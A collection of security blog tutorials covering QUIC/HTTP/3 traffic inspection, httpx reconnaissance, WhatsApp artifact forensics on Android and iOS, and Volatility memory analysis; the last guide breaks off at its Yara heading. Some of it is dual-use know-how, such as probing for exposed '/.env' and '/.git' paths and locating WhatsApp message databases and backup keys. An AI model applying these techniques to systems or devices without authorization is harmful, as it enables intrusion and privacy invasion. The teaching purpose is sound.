
Network Security: Get Started with QUIC and HTTP/3

5 December 2025 at 09:53

Welcome back, aspiring cyberwarriors!

For decades, traditional HTTP traffic over TCP (HTTP/1.1 and HTTP/2) has been the backbone of the web, and we have mature tools to analyze, intercept, and exploit it. But nowadays we have HTTP/3, and its adoption is steadily increasing across the web. In 2022, around 22% of all websites used HTTP/3; by 2025, that number had grown to roughly 40%. As cyberwarriors, we need to stay ahead of these changes.

In this article, we briefly explore what’s under the hood of HTTP/3 and how we can start working with it. Let’s get rolling!

What is HTTP/3?

HTTP/3 is the newest evolution of the Hypertext Transfer Protocol—the system that lets browsers, applications, and APIs move data across the Internet. What sets it apart is its break from TCP, the long-standing transport protocol that has powered the web since its earliest days.

TCP (Transmission Control Protocol) is reliable but inflexible. It was built for accuracy, not speed, ensuring that all data arrives in perfect order, even if that slows the entire connection. Each session requires a multi-step handshake, and if one packet gets delayed, everything behind it must wait. That might have been acceptable for email, but it’s a poor fit for modern, high-speed web traffic.

To overcome these limitations, HTTP/3 uses QUIC (Quick UDP Internet Connections), a transport protocol built on UDP and engineered for a fast, mobile, and latency-sensitive Internet. QUIC minimizes handshake overhead, avoids head-of-line blocking, and encrypts nearly the entire connection by default—right from the start.

After years of development, the IETF officially standardized HTTP/3 in 2022. Today, it’s widely implemented across major browsers, cloud platforms, and an ever-growing number of web servers.

What Is QUIC?

Traditional web traffic follows a predictable pattern. A client initiates a TCP three-way handshake, then performs a TLS handshake on top of that connection, and finally begins sending HTTP requests. QUIC collapses this entire process into a single handshake that combines transport and cryptographic negotiation. The first time a client connects to a server, it can establish a secure connection in just one round trip. On subsequent connections, QUIC can achieve zero round-trip time resumption, meaning the client can send encrypted application data in the very first packet.

The protocol encrypts almost everything except a minimal connection identifier. Unlike TLS over TCP, where we can see TCP headers, sequence numbers, and acknowledgments in plaintext, QUIC encrypts packet numbers, acknowledgments, and even connection close frames. This encryption-by-default approach significantly reduces the metadata available for traffic analysis.

QUIC also implements connection migration, which allows a connection to survive network changes. If a user switches from WiFi to cellular, or their IP address changes due to DHCP renewal, the QUIC connection persists using connection IDs rather than the traditional four-tuple of source IP, source port, destination IP, and destination port.

QUIC Handshake

The process begins when the client sends its Initial packet. This first message contains the client’s supported QUIC versions, the available cipher suites, a freshly generated random number, and a Connection ID — a randomly chosen identifier that remains stable even if the client’s IP address changes. Inside this Initial packet, the client embeds the TLS 1.3 ClientHello message along with QUIC transport parameters and the initial cryptographic material required to start key negotiation. If the client has connected to the server before, it may even include early application data, such as an HTTP request, to save an extra round trip.

The server then responds with its own set of information. It chooses one of the client’s QUIC versions and cipher suites, provides its own random number, and supplies a server-side Connection ID along with its QUIC transport parameters. Embedded inside this response is the TLS 1.3 ServerHello, which contains the cryptographic material needed to derive shared keys. The server also sends its full certificate chain — the server certificate as well as the intermediate certificate authorities (CAs) that signed it — and may optionally include early HTTP response data.

Once the client receives the server’s response, it begins the certificate verification process. It extracts the certificate data and the accompanying signature, identifies the issuing CA, and uses the appropriate root certificate from its trust store to verify the intermediate certificates and, ultimately, the server’s certificate. To do this, it hashes the received certificate data using the algorithm specified in the certificate, then checks whether this computed hash matches the one that can be verified using the CA’s public key. If the values match and the certificate is valid for the current time period and the domain name in use, the client can trust that the server is genuine. At this point, using the TLS key schedule, the client derives the QUIC connection keys and sends its TLS Finished message inside another QUIC packet. With this exchange completed, the connection is fully ready for encrypted application data.

From this moment onward, all traffic between the client and server is encrypted using the established session keys. Unlike traditional TCP combined with TLS, QUIC doesn’t require a separate TLS handshake phase. Instead, TLS is tightly integrated into QUIC’s own handshake, allowing the protocol to eliminate extra round-trips. One of the major advantages of this design is that both the server and client can include actual application data — such as HTTP requests and responses — within the handshake itself. As a result, certificate validation and connection establishment occur in parallel with the initial exchange of real data, making QUIC both faster and more efficient than the older TCP+TLS model.

How Does a QUIC Network Work?

The image below shows the basic structure of a QUIC-based network. As illustrated, HTTP/3 requests, responses, and other application data all travel through QUIC streams. These streams are encapsulated in several logical layers before being transmitted over the network.

Anatomy of a QUIC stream:

A UDP datagram serves as the outer transport container. It contains a header with the source and destination ports, along with length and checksum information, and carries one or more QUIC packets. This is the fundamental unit transmitted between the client and server across the network.

A QUIC packet is the unit contained within a UDP datagram, and each datagram may carry one or more of them. Every QUIC packet consists of a QUIC header along with one or more QUIC frames.

The QUIC header contains metadata about the packet and comes in two formats. The long header is used during connection setup, while the short header is used once the connection is established. The short header includes the connection ID, packet number, and key phase, which indicates the encryption keys in use and supports key rotation. Packet numbers increase continuously for each connection and key phase.

A frame is the smallest structured unit inside a QUIC packet. It contains the frame type, stream ID, offset, and a segment of the stream’s data. Although the data for a stream is spread across multiple frames, it can be reassembled in the correct order using the connection ID, stream ID, and offset.

A stream is a unidirectional or bidirectional channel of data within a QUIC connection. Each QUIC connection can support multiple independent streams, each identified by its own ID. If a QUIC packet is lost, only the streams carried in that packet are affected, while all other streams continue uninterrupted. This independence is what eliminates the head-of-line blocking seen in HTTP/2. Streams can be created by either endpoint and can operate in both directions.

HTTP/3 vs. HTTP/2 vs. HTTP/1: What Actually Changed?

To understand the significance of HTTP/3, it helps to first consider the limitations of its predecessors.

HTTP/1.1, the original protocol still used by millions of websites, handles only one request at a time per TCP connection. This forces browsers to open and close multiple connections just to load a single page, resulting in inefficiency, slower performance, and high sensitivity to network issues.

HTTP/2 introduced major improvements, including multiplexing, which allows multiple requests to share a single TCP connection, as well as header compression and server push. These changes provided significant gains, but the protocol still relies on TCP, which has a fundamental limitation: if one packet is delayed, the entire connection pipeline stalls. This phenomenon, known as head-of-line blocking, cannot be avoided in HTTP/2.

HTTP/3 addresses this limitation by replacing TCP with a more advanced transport layer. Built on QUIC, HTTP/3 establishes encrypted sessions faster, typically requiring only one round-trip instead of three or more. It eliminates head-of-line blocking by giving each stream independent flow control, allowing other streams to continue even if one packet is lost. It can maintain sessions through IP or network changes, recover more gracefully from packet loss, and even support custom congestion control tailored to different workloads.

In short, HTTP/3 is not merely a refined version of HTTP/2. It is a fundamentally redesigned protocol, created to overcome the limitations of previous generations, particularly for mobile users, latency-sensitive applications, and globally distributed traffic.

Get Started with HTTP/3

Modern versions of curl (7.66.0 and later with HTTP/3 support compiled in) can test whether a target supports QUIC and HTTP/3. Here’s how to probe a server:

kali> curl --http3 -I https://www.example.com

This command attempts to connect using HTTP/3 over QUIC, but will fall back to HTTP/2 or HTTP/1.1 if QUIC isn’t supported.
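To rule out a silent fallback, newer curl builds (7.88.0 and later, again with HTTP/3 compiled in) can be told to fail rather than downgrade. You can also check whether a server advertises HTTP/3 through the Alt-Svc response header; both are shown below as a quick sketch:

kali> curl --http3-only -I https://www.example.com

kali> curl -sI https://www.example.com | grep -i alt-svc

If the server supports HTTP/3, the Alt-Svc header will typically contain an h3 entry.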

Besides that, it’s also useful to see how QUIC traffic looks “in the wild.” One of the easiest ways to do this is by using Wireshark, a popular tool for analyzing network packets. Even though QUIC encrypts most of its payload, Wireshark can still identify QUIC packet types, versions, and some metadata, which helps us understand how a QUIC connection is established.

To start, open Wireshark and visit a website that supports QUIC. Cloudflare is a good example because it widely deploys HTTP/3 and the QUIC protocol. QUIC typically runs over UDP port 443, so the simplest filter to confirm that you are seeing QUIC traffic is:

udp.port == 443

This filter shows all UDP traffic on port 443, which almost always corresponds to QUIC when dealing with modern websites.
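If your Wireshark build includes the QUIC dissector, you can also filter on the protocol directly, which catches QUIC even when it runs on a non-standard port:

quic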

QUIC uses different packet types during different stages of the connection. Even though the content is encrypted, Wireshark can still distinguish these packet types.

To show only Initial packets, which are the very first packets exchanged when a client starts a QUIC connection, use:

quic.long.packet_type == 0

Initial packets are part of QUIC’s handshake phase. They are somewhat similar to the “ClientHello” and “ServerHello” messages in TLS, except QUIC embeds the handshake inside the protocol itself.

If you want to view Handshake packets, which continue the cryptographic handshake after the Initial packets, use:

quic.long.packet_type == 2

These packets help complete the secure connection setup before QUIC switches to encrypted “short header” packets for normal data (like HTTP/3 requests and responses).

Also, QUIC has multiple versions, and servers often support more than one. To see packets that use a specific version, try:

quic.version == 0x00000001

This corresponds to QUIC version 1, which is standardized in RFC 9000. By checking which QUIC version appears in the traffic, you can understand what the server supports and whether it is using the standardized version or an older draft version.
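The same inspection works from the command line with tshark, Wireshark’s terminal counterpart. A minimal sketch, assuming eth0 is your capture interface:

kali> tshark -i eth0 -f "udp port 443" -Y quic -O quic

Here -f applies a capture filter, -Y a display filter, and -O expands full protocol details for QUIC only.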

Summary

QUIC isn’t just an incremental upgrade — it’s a complete reimagining of how modern internet communication should work. While the traditional stack of TCP + TLS + HTTP/2 served us well for many years, it was never designed for the realities of today’s internet: global-scale latency, constantly changing mobile connections, and the growing demand for both high performance and strong security. QUIC was built from the ground up to address these challenges, making it faster, more resilient, and more secure for the modern web.

Keep coming back, aspiring cyberwarriors, as we continue to explore how fundamental protocols of the internet are being rewritten.


Bug Bounty: Get Started with httpx

4 December 2025 at 10:05

Welcome back, aspiring cyberwarriors!

Before we can exploit a target, we need to understand its attack surface completely. This means identifying web servers, discovering hidden endpoints, analyzing response headers, and mapping out the entire web infrastructure. Traditional tools like curl and wget are useful, but they’re slow and cumbersome when you’re dealing with hundreds or thousands of targets. You need something faster and more flexible.

Httpx is a fast and multi-purpose HTTP toolkit developed by ProjectDiscovery that allows running multiple probes using a simple command-line interface. It supports HTTP/1.1 and HTTP/2 and can probe for web technologies, response codes, page titles, and much more.

In this article, we will explore how to install httpx, how to use it, and how to extract detailed information about a target. We will also cover advanced filtering techniques and discuss how to use this tool effectively. Let’s get rolling!

Step #1 Install Go Programming Language

Httpx is written in Go, so we need to have the Go programming language installed on our system.

To install Go on Kali Linux, use the following command:

kali > sudo apt install golang-go

Once the installation completes, verify it worked by checking the version:

kali > go version

Step #2 Install httpx Using Go

To install httpx, enter the following command:

kali > go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

The “-v” flag enables verbose output so you can see what’s happening during the installation. The “@latest” tag ensures you’re getting the most recent stable version of httpx. This command will download the source code, compile it, and install the binary in your Go bin directory.

To make sure httpx is accessible from anywhere in your terminal, you need to add the Go bin directory to your PATH if it’s not already there. Check if it’s in your PATH by typing:

kali > echo $PATH

If you don’t see something like “/home/kali/go/bin” in the output, you’ll need to add it. Open your .bashrc or .zshrc file (depending on which shell you use) and add this line:

export PATH=$PATH:~/go/bin

Then reload your shell configuration:

kali > source ~/.bashrc

Now verify that httpx is installed correctly by checking its version:

kali > httpx -version

Step #3 Basic httpx Usage and Probing

Let’s start with some basic httpx usage to understand how the tool works. Httpx is designed to take a list of hosts and probe them to determine if they’re running web servers and extract information about them.

The simplest way to use httpx is to provide a single target directly on the command line. Let’s probe a single domain:

kali> httpx -u "example.com" -probe

This command sends an HTTP probe to the website and reports whether it responds, which is useful for quickly checking the availability of the web page.

Now let’s try probing multiple targets at once. Create a file with several domains you want to probe.

Now run httpx against this file:

kali > httpx -l hosts.txt -probe
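If you want machine-readable results that you can feed into other tools, httpx can emit JSON lines and write them to a file. A quick sketch using the same hosts.txt:

kali > httpx -l hosts.txt -probe -json -o results.json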

Step #4 Extracting Detailed Information

One of httpx’s most powerful features is its ability to extract detailed information about web servers in a single pass.

Let’s quickly identify what web server is hosting each target:

kali > httpx -l hosts.txt -server

Now let’s extract even more information using multiple flags:

kali> httpx -l hosts.txt -title -tech-detect -status-code -content-length -response-time

This command will extract the page title, detect web technologies, show the HTTP status code, display the content length, and measure the response time.

The “-tech-detect” flag is particularly valuable because it uses Wappalyzer fingerprints to identify the technologies running on each web server. This can reveal content management systems, web frameworks, and other technologies that might have known vulnerabilities.

Step #5 Advanced Filtering and Matchers

Filters in httpx allow you to exclude unwanted responses based on specific criteria, such as HTTP status codes or text content.

Let’s say you don’t want to see targets that return a 301 status code. For this purpose, the -filter-code or -fc flag exists. To see the results clearly, I’ve added the -status-code or -sc flag as well:

kali > httpx -l hosts.txt -sc -fc 301

Httpx outputs filtered results without status code 301. Besides that, you can filter “dead” or default/error responses with the -filter-error-page or -fep flag.

kali> httpx -l hosts.txt -sc -fep

This flag enables “filter response with ML-based error page detection”. In other words, when you use -fep, httpx tries to detect and filter out responses that look like generic or error pages.

In addition to filters, httpx has matchers. While filters exclude unwanted responses, matchers include only the responses that meet specific criteria. Think of filters as removing noise, and matchers as focusing on exactly what you’re looking for.

For example, let’s output only responses with 200 status code using the -match-code or -mc flag:

kali> httpx -l hosts.txt -status-code -match-code 200

For more advanced filtering, you can use regex patterns to match specific content in the response (-match-regex or -mr flag):

kali> httpx -l hosts.txt -match-regex "admin|login|dashboard"

This will only show targets whose response body contains the words “admin,” “login,” or “dashboard,” helping you quickly identify administrative interfaces or login pages.
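Httpx also reads targets from stdin, which makes it easy to chain with other reconnaissance tools. For example, assuming you also have ProjectDiscovery’s subfinder installed, you can enumerate subdomains and probe them in a single pipeline:

kali > subfinder -d example.com -silent | httpx -silent -sc -title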

Step #6 Probing for Specific Vulnerabilities and Misconfigurations

Httpx can be used to quickly identify common vulnerabilities and misconfigurations across large numbers of targets. While it’s not a full vulnerability scanner, it can detect certain issues that indicate potential security problems.

For example, let’s probe for specific paths that might indicate vulnerabilities or interesting endpoints:

kali > httpx -l targets.txt -path "/admin,/login,/.git,/backup,/.env"

The -path flag, as the name suggests, tells httpx to probe specific paths on each target.

Another useful technique is probing for different HTTP methods:

kali > httpx -l targets.txt -sc -method -x all

In the command above, the -method flag displays the HTTP request method used, and -x all tells httpx to probe with all supported methods.
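When you scale this up to thousands of targets, it’s worth tuning concurrency and request rate so you don’t overwhelm targets or trip rate limiting. The values below are illustrative, not recommendations:

kali > httpx -l targets.txt -sc -title -threads 100 -rate-limit 50 -o results.txt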

Summary

Traditional HTTP probing tools are too slow and limited for the kind of large-scale reconnaissance that modern bug bounty and pentesting demands. Httpx provides a fast, flexible, and powerful solution that’s specifically designed for security researchers who need to quickly analyze hundreds or thousands of web targets while extracting comprehensive information about each one.

In this article, we covered how to install httpx and walked through basic and advanced usage examples, as well as ideas on how httpx might be used for vulnerability detection. This tool is really fast and can significantly boost your productivity, whether you’re conducting bug bounty hunting or web app security testing. Check it out; maybe it will find a place in your cyberwarrior’s toolbox.

Mobile Forensics: Extracting Data from WhatsApp

3 December 2025 at 10:09

Welcome back, aspiring digital investigators!

Today we will take a look at WhatsApp forensics. WhatsApp is one of those apps that are both private and routine for many users. People treat chats like a private conversation, and because it feels comfortable, users often share things there that they would not say on public social networks. That’s why WhatsApp is so critical for digital forensics. The app stores conversations, media, timestamps, group membership information and metadata that can help reconstruct events, identify contacts and corroborate timelines in criminal and cyber investigations.

At Hackers-Arise we offer professional digital forensics services that support cybercrime investigations and fraud examinations. WhatsApp forensics is done to find reliable evidence. The data recovered from a device can show who communicated with whom, when messages were sent and received, what media was exchanged, and often which account owned the device. That information is used to link suspects and verify statements. Combined with location artifacts, it can also map movements, producing evidence that investigators and prosecutors can trust.

You will see how WhatsApp keeps its data on different platforms and what those files contain.

WhatsApp Artifacts on Android Devices

On Android, WhatsApp stores most of its private application data inside the device’s user data area. In a typical layout you will find the app’s files under a path such as /data/data/com.whatsapp/ (or equivalently /data/user/0/com.whatsapp/ on many devices). Those directories are not normally accessible without elevated privileges. To read them directly you will usually need superuser (root) access on the device or a physical dump of the file system obtained through lawful and technically appropriate means. If you do not have root or a physical image, your options are restricted to logical backups or other extraction methods which may not expose the private WhatsApp databases.

[Image: WhatsApp files on Android. Source: Group-IB]

Two files deserve immediate attention on Android: wa.db and msgstore.db. Both are SQLite databases and together they form the core of WhatsApp evidence.

[Image: Analyzing the wa.db file. Source: Group-IB]

wa.db is the contacts database. It lists the WhatsApp user’s contacts and typically contains phone numbers, display names, status strings, timestamps for when contacts were created or changed, and other registration metadata. You will usually open the file with a SQLite browser or query it with sqlite3 to inspect tables. The key tables investigators look for are the table that stores contact records (often named wa_contacts or similar), sqlite_sequence which holds auto-increment counts and gives you a sense of scale, and android_metadata which contains localization info such as the app language.

[Image: Reading contact names. Source: Group-IB]

Wa.db is essentially the address book for WhatsApp. It has names, numbers and a little context for each contact.
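For a first pass, the sqlite3 command-line client is usually enough. Below is a minimal sketch that assumes the legacy wa_contacts layout; since column names vary between app versions, run .schema first and adjust:

kali > sqlite3 wa.db "SELECT display_name, number, status FROM wa_contacts LIMIT 20;"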

[Image: The msgstore.db file. Source: Group-IB]

msgstore.db is the message store. This database contains sent and received messages, timestamps, message status, sender and receiver identifiers, and references to media files. In many WhatsApp versions you will find tables that include a general information table (often named sqlite_sequence), a full-text index table for message content (message_fts_content or similar), the main messages table which usually contains the message body and metadata, messages_thumbnails which catalogs images and their timestamps, and a chat_list table that stores conversation entries. 

Be aware that WhatsApp evolves and field names change between versions. Newer schema versions may include extra fields such as media_enc_hash, edit_version, or payment_transaction_id. Always inspect the schema before you rely on a specific field name.
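With that caveat in mind, here is a hedged example query against an older schema, where the messages table stores the body in data and a millisecond Unix timestamp in timestamp:

kali > sqlite3 msgstore.db "SELECT key_remote_jid, data, datetime(timestamp/1000,'unixepoch') FROM messages ORDER BY timestamp DESC LIMIT 20;"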

[Image: Finding and reading WhatsApp messages. Source: Group-IB]

On many Android devices WhatsApp also keeps encrypted backups in a public storage location, typically under /data/media/0/WhatsApp/Databases/ (the virtual SD card) or /mnt/sdcard/WhatsApp/Databases/ for physical SD cards. Those backup files look like msgstore.db.cryptXX, where XX indicates the cryptographic scheme version.

[Image: Encrypted WhatsApp backup files. Source: Group-IB]

The msgstore.db.cryptXX files are an encrypted copy of msgstore.db intended for device backups. To decrypt them you need a cryptographic key that WhatsApp stores privately on the device, usually somewhere like /data/data/com.whatsapp/files/. Without that key, those encrypted backups are not readable.

Other important Android files and directories to examine include the preferences and registration XMLs in /data/data/com.whatsapp/shared_prefs/. The file com.whatsapp_preferences.xml often contains profile details and configuration values. A fragment of such a file may show the phone number associated with the account, the app version, a profile message such as “Hey there! I am using WhatsApp.” and the account display name. The registration.RegisterPhone.xml file typically contains registration metadata like the phone number and regional format. 

The axolotl.db file in /data/data/com.whatsapp/databases/ holds cryptographic keys (used in the Signal/Double Ratchet protocol implementation) and account identification data. chatsettings.db contains app settings. Logs are kept under /data/data/com.whatsapp/files/Logs/ and may include whatsapp.log as well as compressed rotated backups like whatsapp-YYYY-MM-DD.1.log.gz. These logs can reveal app activity and errors that may be useful for timing or troubleshooting analysis.

[Image: WhatsApp logs. Source: Group-IB]

Media is often stored in the media tree on internal or external storage: /data/media/0/WhatsApp/Media/WhatsApp Images/ for images, /data/media/0/WhatsApp/Media/WhatsApp Voice Notes/ for voice messages (usually Opus format), and sibling folders for WhatsApp Audio, WhatsApp Video, and WhatsApp Profile Photos.

[Image: WhatsApp data stored on external storage. Source: Group-IB]

Within the app’s private area you may also find cached profile pictures under /data/data/com.whatsapp/cache/Profile Pictures/ and avatar thumbnails under /data/data/com.whatsapp/files/Avatars/. Some avatar thumbnails use a .j extension while actually being JPEG files. Always validate file signatures rather than trusting extensions.
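The file utility makes this check trivial; for example, on the avatar thumbnails mentioned above:

kali > file /data/data/com.whatsapp/files/Avatars/*.j

Genuine JPEGs will be reported as JPEG image data regardless of the .j extension.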

If the device uses an SD card, a WhatsApp directory at the card’s root may store copies of shared files (/mnt/sdcard/WhatsApp/.Share/), a trash folder for deleted content (/mnt/sdcard/WhatsApp/.trash/), and the Databases subdirectory with encrypted backups and media subfolders mirroring those on internal storage. The presence of deleted files or .trash folders can be a fruitful source of recovered media.

A key complication on Android is manufacturer or custom-ROM behavior. Some vendors add features that change where app data is stored. For example, certain Xiaomi phones implement a “Second Space” feature that creates a second user workspace. WhatsApp in the second workspace stores its data under a different user ID path such as /data/user/10/com.whatsapp/databases/wa.db rather than the usual /data/user/0/com.whatsapp/databases/wa.db.

As things evolve and change, you need to validate the actual paths on the target device rather than assuming standard locations.

WhatsApp Artifacts on iOS Devices

On iOS, WhatsApp tends to centralize its data into a few places and is commonly accessible via device backups. The main application database is often ChatStorage.sqlite located under a shared group container such as /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/ (some forensic tools display this as AppDomainGroup-group.net.whatsapp.WhatsApp.shared).

[Image: The ChatStorage.sqlite file on iOS. Source: Group-IB]

Within ChatStorage.sqlite the most informative tables are often ZWAMESSAGE, which stores message records, and ZWAMEDIAITEM, which stores metadata for attachments and media items. Other tables like ZWAPROFILEPUSHNAME and ZWAPROFILEPICTUREITEM map WhatsApp identifiers to display names and avatars. The table Z_PRIMARYKEY typically contains general database metadata such as record counts.
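As on Android, a SQLite one-liner gets you oriented. A sketch assuming the column names above; note that ZMESSAGEDATE is a Core Data timestamp counting seconds from 2001-01-01, hence the 978307200 offset:

kali > sqlite3 ChatStorage.sqlite "SELECT datetime(ZMESSAGEDATE + 978307200,'unixepoch') AS sent, ZTEXT FROM ZWAMESSAGE ORDER BY ZMESSAGEDATE DESC LIMIT 20;"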

[Image: Extracting texts from iOS WhatsApp backups. Source: Group-IB]

iOS also places supporting files in the group container. BackedUpKeyValue.sqlite can contain cryptographic keys and data useful for identifying account ownership. ContactsV2.sqlite stores contact details: names, phone numbers, profile statuses and WhatsApp IDs. A simple text file like consumer_version may hold the app version, and current_wallpaper.jpg (or wallpaper in older versions) contains the background image used in WhatsApp chats. The blockedcontacts.dat file lists blocked numbers, and pw.dat can hold an encrypted password. Preference plists such as net.whatsapp.WhatsApp.plist or group.net.whatsapp.WhatsApp.shared.plist store profile settings.

[Image: Contact info and preferences on iOS. Source: Group-IB]

Media thumbnails, avatars and message media are stored under paths like /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/Media/Profile/ and /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/Message/Media/. WhatsApp logs, for example calls.log and calls.backup.log, often survive in the Documents or Library/Logs folders and can help establish call activity.

Because iOS devices are frequently backed up through iTunes or Finder, you can often extract WhatsApp artifacts from a device backup rather than needing a full file system image. If the backup is unencrypted and complete, it may include the ChatStorage.sqlite file and associated media. If the backup is encrypted you will need the backup password or legal access methods to decrypt it. In practice, many investigators create a forensic backup and then examine the WhatsApp databases with a SQLite viewer or a specialized forensic tool that understands WhatsApp schema differences across versions.

Practical Notes For Beginners

From the databases and media files described above you can recover contact lists, full or partial chat histories, timestamps in epoch format (commonly Unix epoch in milliseconds on Android), message status (sent, delivered, read), media filenames and hashes, group membership, profile names and avatars, blocked contacts, and even application logs and version metadata. These artifacts help us understand who communicated with whom, when messages were exchanged, whether media were transferred, and which accounts were configured on the device.

For beginners, a few practical cautions are important to keep in mind. First, always operate on forensic images or copies of extracted files. Do not work directly on the live device unless you are performing an approved, controlled acquisition and you have documented every action. Second, use reliable forensic tools to open SQLite databases. If you are parsing fields manually, confirm timestamp formats and time zones. Third, encrypted backups require the device’s key to decrypt. The key is usually stored in the private application area on Android, and without it you cannot decode the .cryptXX files. Fourth, deleted chats and files are not always gone, as databases may leave records or media may remain in caches or on external storage. Yet recovery is never guaranteed and depends on many factors including the time since deletion and subsequent device activity.
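For example, you can convert a millisecond Android timestamp to a readable UTC date with GNU date (the value here is hypothetical):

kali > date -u -d @"$((1695200000000 / 1000))"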

When you review message tables, map the message ID fields to media references carefully. Many WhatsApp versions use separate tables for media items where the actual file is referenced by a media ID or filename. Thumbnail tables and media directories will help you reconstruct the link between a textual message and the file that accompanied it. Pay attention to the presence of additional fields in newer app versions. These may contain payment IDs, edit history or encryption metadata. Adapt your queries accordingly.

Finally, because WhatsApp and operating systems change over time, always inspect the schema and file timestamps on the specific evidence you have. Do not assume field names or paths are identical between devices or app versions. Keep a list of the paths and filenames you find so you can reproduce your process and explain it in reports.

Summary

WhatsApp forensics is a rich discipline. On Android the primary artifacts are the wa.db contacts database, the msgstore.db message store and encrypted backups such as msgstore.db.cryptXX, together with media directories, preference XMLs and cryptographic key material in the app private area. On iOS the main artifact is ChatStorage.sqlite and a few supporting files in the app group container and possibly contained in a device backup. To retrieve and interpret these artifacts you must have appropriate access to the device or an image and know where to look for the app files on the device you are examining. Also, be comfortable inspecting SQLite databases and be prepared to decrypt backups where necessary.

If this kind of work interests you and you want to understand how real mobile investigations are carried out, you can also join our three-day mobile forensics course. The training walks you through the essentials of Android and iOS, explains how evidence is stored on modern devices, and shows you how investigators extract and analyze that data during real cases. You will work with practical labs that involve hidden apps, encrypted communication, and devices that may have been rooted or tampered with. 

Learn more:

https://hackersarise.thinkific.com/courses/mobile-forensics

Digital Forensics: Volatility – Memory Analysis Guide, Part 2

1 December 2025 at 10:31

Hello, aspiring digital forensics investigators!

Welcome back to our guide on memory analysis!

In the first part, we covered the fundamentals, including processes, dumps, DLLs, handles, and services, using Volatility as our primary tool. We created this series to give you more clarity and help you build confidence in handling memory analysis cases. Digital forensics is a fascinating area of cybersecurity, and earning a certification in it can open many doors for you. Once you grasp the key concepts, you’ll find it easier to navigate the field. Ultimately, it all comes down to mastering a core set of commands, along with persistence and curiosity. Governments, companies, law enforcement, and federal agencies are all in need of skilled professionals. As cyberattacks become more frequent and sophisticated, often with the help of AI, opportunities for digital forensics analysts will only continue to grow.

Now, in part two, we’re building on that foundation to explore more areas that help uncover hidden threats. We’ll look at network info to see connections, registry keys for system changes, files in memory, and some scans like malfind and Yara rules to find malware. Plus, as promised, there are bonuses at the end with quick ways to pull out extra details.

Network Information

As a beginner analyst, you’d run network commands to check for sneaky connections, like malware phoning home to hackers. For example, imagine investigating a company’s network after a data breach: these tools could reveal a hidden link to a foreign server stealing customer info, helping you trace the attacker.

‘Netscan’ scans for all network artifacts, including TCP/UDP. ‘Netstat’ lists active connections and sockets. In Vol 2, XP/2003-specific plugins like ‘connscan’ and ‘connections’ focus on TCP, while ‘sockscan’ and ‘sockets’ focus on sockets, but they’re old and not present in Vol 3.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> netscan

vol.py -f "/path/to/file" --profile <profile> netstat

XP/2003 SPECIFIC:

vol.py -f "/path/to/file" --profile <profile> connscan

vol.py -f "/path/to/file" --profile <profile> connections

vol.py -f "/path/to/file" --profile <profile> sockscan

vol.py -f "/path/to/file" --profile <profile> sockets

Volatility 3:

vol.py -f "/path/to/file" windows.netscan

vol.py -f "/path/to/file" windows.netstat

bash$ > vol -f Windows7.vmem windows.netscan

[Screenshot: windows.netscan output]

This output shows network connections with protocols, addresses, and PIDs. Perfect for spotting unusual traffic.

bash$ > vol -f Windows7.vmem windows.netstat

[Screenshot: windows.netstat output]

Here, you’ll get a list of active sockets and states, like listening or established links.

Note that the XP/2003-specific plugins are deprecated and therefore not available in Volatility 3, although such legacy systems are still common in the poorly financed government sector.

Registry

Hive List

You’d use hive list commands to find registry hives in memory, which store system settings; malware often tweaks these for persistence. Say you’re checking a home computer after suspicious pop-ups. This could show changes to startup keys that launch bad software every boot.

‘hivescan’ scans for hive structures. ‘hivelist’ lists them with virtual and physical addresses.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> hivescan

vol.py -f "/path/to/file" --profile <profile> hivelist

Volatility 3:

vol.py -f "/path/to/file" windows.registry.hivescan

vol.py -f "/path/to/file" windows.registry.hivelist

bash$ > vol -f Windows7.vmem windows.registry.hivelist

[Screenshot: hivelist output]

This lists the registry hives with their paths and offsets for further digging.

bash$ > vol -f Windows7.vmem windows.registry.hivescan

[Screenshot: hivescan output]

The scan output highlights hive locations in memory.

Printkey

Printkey is handy for viewing specific registry keys and values, like checking for malware-added entries. For instance, in a ransomware case, you might look at keys that control file associations to see if they’ve been hijacked.

Without a key, it shows defaults, while -K or –key targets a certain path.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> printkey

vol.py -f "/path/to/file" --profile <profile> printkey -K "Software\Microsoft\Windows\CurrentVersion"

Volatility 3:

vol.py -f "/path/to/file" windows.registry.printkey

vol.py -f "/path/to/file" windows.registry.printkey --key "Software\Microsoft\Windows\CurrentVersion"

bash$ > vol -f Windows7.vmem windows.registry.printkey

[Screenshot: printkey output]

This gives a broad view of registry keys.

bash$ > vol -f Windows7.vmem windows.registry.printkey --key "Software\Microsoft\Windows\CurrentVersion"

[Screenshot: printkey output for the specified key]

Here, it focuses on the specified key, showing subkeys and values.

Files

File Scan

Filescan helps list files cached in memory, even deleted ones, which is great for finding malware files that were run but erased from disk. This can uncover temporary files from the infection.

Both versions scan for file objects in memory pools.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> filescan

Volatility 3:

vol.py -f "/path/to/file" windows.filescan

bash$ > vol -f Windows7.vmem windows.filescan

[Screenshot: filescan output]

This output lists file paths, offsets, and access types.

File Dump

You’d dump files to extract them from memory for closer checks, like pulling a suspicious script. In a corporate espionage probe, dumping a hidden document could reveal leaked secrets.

Without options, it dumps all. With offsets or PID, it targets specific ones. Vol 3 uses virtual or physical addresses.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> dumpfiles --dump-dir="/path/to/dir"

vol.py -f "/path/to/file" --profile <profile> dumpfiles --dump-dir="/path/to/dir" -Q <offset>

vol.py -f "/path/to/file" --profile <profile> dumpfiles --dump-dir="/path/to/dir" -p <PID>

Volatility 3:

vol.py -f "/path/to/file" -o "/path/to/dir" windows.dumpfiles

vol.py -f "/path/to/file" -o "/path/to/dir" windows.dumpfiles --virtaddr <offset>

vol.py -f "/path/to/file" -o "/path/to/dir" windows.dumpfiles --physaddr <offset>

bash$ > vol -f Windows7.vmem windows.dumpfiles

[Screenshot: dumpfiles output]

This pulls all cached files Windows has in RAM.

Miscellaneous

Malfind

Malfind scans for injected code in processes, flagging potential malware.

Vol 2 shows basics like hexdump. Vol 3 adds more details like protection and disassembly.

Volatility 2:

vol.py -f "/path/to/file" --profile <profile> malfind

Volatility 3:

vol.py -f "/path/to/file" windows.malfind

bash$ > vol -f Windows7.vmem windows.malfind

[Screenshot: malfind flagging suspicious injections]

This highlights suspicious memory regions with details.

Yara Scan

